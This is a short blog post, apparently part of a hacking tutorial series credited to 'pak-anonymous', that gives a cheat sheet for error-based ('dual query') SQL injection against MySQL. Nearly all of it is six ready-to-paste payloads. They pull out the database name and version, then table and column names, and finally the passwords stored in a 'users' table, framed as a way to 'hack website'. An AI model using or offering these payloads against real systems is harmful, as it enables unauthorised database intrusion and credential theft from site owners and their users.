sql injection (part 3) dual query injection
NOTE::watch first 2 parts then watch this part
dual query injection cheat sheet :)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
AND (select 1 from (select count(*), concat(0x3a,0x3a,(select password from users limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)
how to hack website with dual query injection by pak-anonymous
0 comments:
Post a Comment